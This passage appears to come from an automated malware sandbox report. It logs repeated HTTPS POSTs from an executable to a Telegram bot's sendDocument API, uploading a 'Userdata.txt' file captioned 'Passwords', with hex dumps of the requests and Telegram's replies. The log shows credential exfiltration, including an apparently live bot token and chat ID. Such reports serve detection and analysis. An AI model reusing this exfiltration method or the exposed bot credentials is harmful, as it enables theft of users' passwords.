                                                                                                            2025-01-10 20:53:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 32 37 36 64 35 34 38 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd325276d5484dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:53 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:53 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:53 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44737,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542433,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.550002149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:54 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3266c884144d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 36 63 38 38 34 31 34 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3266c884144dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:55 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:55 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:55 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44738,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542435,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.550004149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:56 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3279b0efee4d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 39 62 30 65 66 65 65 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3279b0efee4dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:56 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:56 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:56 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44739,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542436,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.550006149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:58 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd328b327df4cc
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 62 33 32 37 64 66 34 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd328b327df4ccContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:53:58 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:53:58 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:53:58 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44740,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542438,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.550008149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:59 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd329dfebbbd2f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 64 66 65 62 62 62 64 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd329dfebbbd2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:00 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:00 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44741,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542440,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.550010149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:01 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32b213189091
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 32 31 33 31 38 39 30 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32b213189091Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:02 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:01 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:02 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44742,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542441,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.550012149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:03 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32c36d0ba952
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 33 36 64 30 62 61 39 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32c36d0ba952Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:03 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:03 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:03 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44743,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542443,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.550014149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:05 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32d60ea18c5f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
